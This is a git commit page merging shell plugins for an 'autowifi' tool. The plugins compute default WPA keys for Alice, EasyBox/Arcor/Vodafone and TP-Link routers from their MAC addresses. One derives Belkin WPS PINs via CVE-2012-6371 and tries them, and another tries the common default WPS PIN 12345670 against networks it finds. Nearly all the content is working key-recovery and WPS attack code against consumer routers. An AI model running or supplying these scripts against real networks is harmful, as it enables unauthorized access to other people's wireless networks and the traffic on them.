summaryrefslogtreecommitdiffstats
path: root/usr/lib/autowifi/plugins
diff options
context:
space:
mode:
authormakefu <github@syntax-fehler.de>2014-12-20 22:02:08 +0100
committermakefu <github@syntax-fehler.de>2014-12-20 22:02:08 +0100
commit16e1373ddd9050dd06cd699b2874cf178375574b (patch)
tree0352a0f39f4426327ffd4aa16dad8e0e15a6a8c4 /usr/lib/autowifi/plugins
parent120114ad12a212331e9e790305a4ab3afdc15857 (diff)
parent6a9beb12dad44b5e1efa984b112c7a6b8c13a118 (diff)
Merge remote-tracking branch 'inspector_wifi/wifi_scanner'
Conflicts: .gitignore
Diffstat (limited to 'usr/lib/autowifi/plugins')
-rwxr-xr-xusr/lib/autowifi/plugins/00profile11
-rwxr-xr-xusr/lib/autowifi/plugins/01open6
-rwxr-xr-xusr/lib/autowifi/plugins/02alice20
-rwxr-xr-xusr/lib/autowifi/plugins/02easybox37
-rwxr-xr-xusr/lib/autowifi/plugins/02tplink17
-rwxr-xr-xusr/lib/autowifi/plugins/11belkin_wps40
-rwxr-xr-xusr/lib/autowifi/plugins/30default_wps18
7 files changed, 149 insertions, 0 deletions
diff --git a/usr/lib/autowifi/plugins/00profile b/usr/lib/autowifi/plugins/00profile
new file mode 100755
index 00000000..d7fb9c75
--- /dev/null
+++ b/usr/lib/autowifi/plugins/00profile
@@ -0,0 +1,11 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
+# ENV:
+# root (default: /)
+root=${root:-/}
+cat $root/etc/autowifi/wifi_keys 2>/dev/null | (while IFS='|' read SSID MAC BANDWIDTH KEY; do
+ if [ "$1" == "$SSID" -a "$2" == "$MAC" ]; then
+ echo $KEY
+ exit 0
+ fi
+done; exit 1)
diff --git a/usr/lib/autowifi/plugins/01open b/usr/lib/autowifi/plugins/01open
new file mode 100755
index 00000000..881f47ea
--- /dev/null
+++ b/usr/lib/autowifi/plugins/01open
@@ -0,0 +1,6 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION
+if [ "$4" == "[ESS]" ]; then
+ exit 0
+fi
+exit 1
diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice
new file mode 100755
index 00000000..1b4533a4
--- /dev/null
+++ b/usr/lib/autowifi/plugins/02alice
@@ -0,0 +1,20 @@
+#!/bin/sh
+# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
+# Based on Poc from
+# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
+#
+#
+# ESSID MAC CHANNEL ENCRYPTION
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1
+
+# printf always makes string to lower, need that for correct md5sum
+ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
+TMP=$(printf $ETHMAC | md5sum)
+printf ${TMP:0:12} | base64
+exit 0
diff --git a/usr/lib/autowifi/plugins/02easybox b/usr/lib/autowifi/plugins/02easybox
new file mode 100755
index 00000000..3d7cb8c1
--- /dev/null
+++ b/usr/lib/autowifi/plugins/02easybox
@@ -0,0 +1,37 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+parse_plugin_args "$@"
+
+if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then
+ echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone"
+ exit 1
+else
+
+ # Fill up to 4 places with zeros, if necessary:
+ deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
+ #
+ # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
+ hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
+ #echo 'M4 (Hex): ' ${hexi[@]}
+ # K1 = last byte of (d0 + d1 + h2 + h3)
+ # K2 = last byte of (h0 + h1 + d2 + d3)
+ c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1})
+ c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1})
+ K1=$((($c1)%16))
+ K2=$((($c2)%16))
+ #printf "K1: %x\n" $K1
+ #printf "K2: %x\n" $K2
+ X1=$((K1^${deci:6:1}))
+ X2=$((K1^${deci:4:1}))
+ X3=$((K1^${deci:2:1}))
+ Y1=$((K2^0x${hexi:2:1}))
+ Y2=$((K2^0x${hexi:4:1}))
+ Y3=$((K2^0x${hexi:6:1}))
+ Z1=$((0x${hexi:4:1}^${deci:6:1}))
+ Z2=$((0x${hexi:6:1}^${deci:4:1}))
+ Z3=$((K1^K2))
+ printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F
+fi
diff --git a/usr/lib/autowifi/plugins/02tplink b/usr/lib/autowifi/plugins/02tplink
new file mode 100755
index 00000000..b2b96f95
--- /dev/null
+++ b/usr/lib/autowifi/plugins/02tplink
@@ -0,0 +1,17 @@
+#!/bin/sh
+# Implementation of TP-Link default WPA Key
+# Based on
+# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1
+! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1
+
+
+# printf always makes string to lower, need that for correct md5sum
+printf ${MAC:4:12}
+exit 0
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
new file mode 100755
index 00000000..d4eb8e37
--- /dev/null
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -0,0 +1,40 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
+# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
+# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+. ../lib/wps
+parse_plugin_args "$@"
+
+check_painmode
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
+
+calc_belkin(){
+ PRIVATE_MAC=${1}
+
+ p=$((0x$PRIVATE_MAC % 10000000))
+ wps_pin_checksum(){
+ pin=$1
+ accum=0
+ while [ $pin -ne 0 ];do
+ accum=$((accum + (3 * (pin % 10)) ))
+ pin=$((pin/10))
+ accum=$((accum + pin %10 ))
+ pin=$((pin/10))
+ done
+ echo $(( (10 - accum % 10) % 10))
+ }
+ printf "%07d%d" $p $(wps_pin_checksum $p)
+ return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})
diff --git a/usr/lib/autowifi/plugins/30default_wps b/usr/lib/autowifi/plugins/30default_wps
new file mode 100755
index 00000000..50ad2676
--- /dev/null
+++ b/usr/lib/autowifi/plugins/30default_wps
@@ -0,0 +1,18 @@
+#!/bin/sh
+# on MANY WPS-enabled devices the pin is 12345670 , so we can give it a shot
+# http://www.wotan.cc/?p=75
+cd $(dirname $(readlink -f $0))
+. ../lib/wps
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+check_painmode
+DEFAULT_PIN="${DEFAULT_PIN:-12345670}"
+
+if has_wps "$ENC"; then
+ echo "trying PIN $DEFAULT_PIN against $ESSID" >&2
+ try_wps_pin "$@" $DEFAULT_PIN
+else
+ echo "Network $ESSID not WPS enabled"
+ exit 1
+fi